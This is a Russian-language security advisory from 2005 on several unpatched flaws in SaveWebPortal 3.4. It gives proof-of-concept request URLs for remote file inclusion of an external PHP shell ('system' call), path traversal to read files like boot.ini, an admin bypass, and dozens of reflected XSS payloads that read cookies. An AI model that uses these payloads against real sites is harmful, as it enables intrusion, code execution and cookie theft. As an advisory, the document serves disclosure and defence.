Security Lab

Множественные уязвимости в SaveWebPortal

Дата публикации:24.08.2005
Дата изменения:24.03.2009
Всего просмотров:1979
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2685
CVE-2005-2686
CVE-2005-2687
CVE-2005-2688
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SaveWebPortal 3.x
Уязвимые версии: SaveWebPortal 3.4

Описание: Удаленный пользователь может выполнить произвольный код на целевой системе, получить неавторизованный административный доступ и выполнить XSS нападение:

1. Выполнение произвольного кода:

http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site ]/cmd.gif%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00
 
Где cmd.gif:

<?php system('[some command]'); ?>

2. Удаленный пользователь может включить и выполнить произвольные PHP файлы на целевой системе:
http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00
http://[ target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00
3. Удаленный пользователь также может просматривать не PHP файлы на целевой системе:
http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00
4. Удаленный пользователь может обойти авторизацию и получить административный доступ:
http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fich ier=header.php&type=Source
5. С административным доступом, удаленный пользователь может внедрить произвольный PHP код в 'header.php' файл (или подобный файл) и затем заставить Web сервер выполнить этот код.

В нескольких сценариях обнаружена XSS уязвимость:

 http://[target]/saveweb/footer.p hp?TABLE_Width=><script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?SITE_Author_Domain=><script>alert(document.cookie)</script>
http://[target]/s aveweb/footer.php?SITE_Author=><script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?L_Info=><script>alert(document.cookie)</script>
http://[target ]/saveweb/footer.php?L_Help=><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?TABLE_Width=><script>alert(document.cookie)</script>
http://[tar get]/saveweb/header.php?L_Visitors=><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?count=><script>alert(document.cookie)</script>
http://[ta rget]/saveweb/header.php?SITE_Logo="><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?BANNER_Url="><script>alert(document.cookie)</script>

h ttp://[target]/saveweb/header.php?L_Sunday="}</script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Monday="}</script><script>alert(do cument.cookie)</script><!--
[etc.]

http://[target]/saveweb/header.php?L_January="}</script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header .php?L_February="}</script><script>alert(document.cookie)</script><!--
[etc.]

http://[target]/saveweb/header.php?IMAGES_Url="><script>alert(document.cookie)</script>< !--
http://[target]/saveweb/header.php?L_Info="><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Help="><script>alert(document.cookie)</ script><!--

http://[target]/saveweb/menu_dx.php?L_InsertCorrectly=<script>alert(document.cookie)</script>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Login=<script>a lert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_Username=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php ?L_MENUDX_Password=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_Ok=<script>alert(document.cookie)</script><!--
http://[target]/save web/menu_dx.php?IMAGES_Url="><script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_Registration="><script>alert(document.cookie)</scri pt><!--
http://[target]/saveweb/menu_dx.php?BANNER_Url="><script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUSX_Newsletter=<script>ale rt(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_InsertEMail=<script>alert(document.cookie)</script><!--

http://[target]/saveweb/menu_sx. php?L_InsertNOK3Char=");}</script><script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels=<script>alert(document.cookie)</s cript><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Home=<script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive=<s cript>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Search=<script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Ok=<scr ipt>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?IMAGES_Url="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUS X_Services="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Links="><script>alert(document.cookie)</script>
http://[target]/savewe b/menu_sx.php?L_MENUSX_Newsletter="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Polls="><script>alert(document.cookie)</script>

http://[target]/saveweb/menu_sx.php?L_MENUSX_ECards="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Downloads="><script>alert(doc ument.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Community="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_For um="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Chat="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx .php?L_MENUSX_Nicknames="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Membership="><script>alert(document.cookie)</script>
http ://[target]/saveweb/menu_sx.php?L_MENUSX_Login="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_UserProfile="><script>alert(documen t.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_PasswordForgot="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Lo gout="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Contacts="><script>alert(document.cookie)</script>
http://[target]/saveweb/m enu_sx.php?L_MENUSX_Guestbook="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)</script>

URL производителя:http://www.circeos.it/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: SaveWebPortal 3.4 remote code execution / admin check bypass / remote file inclusion / cross site scripting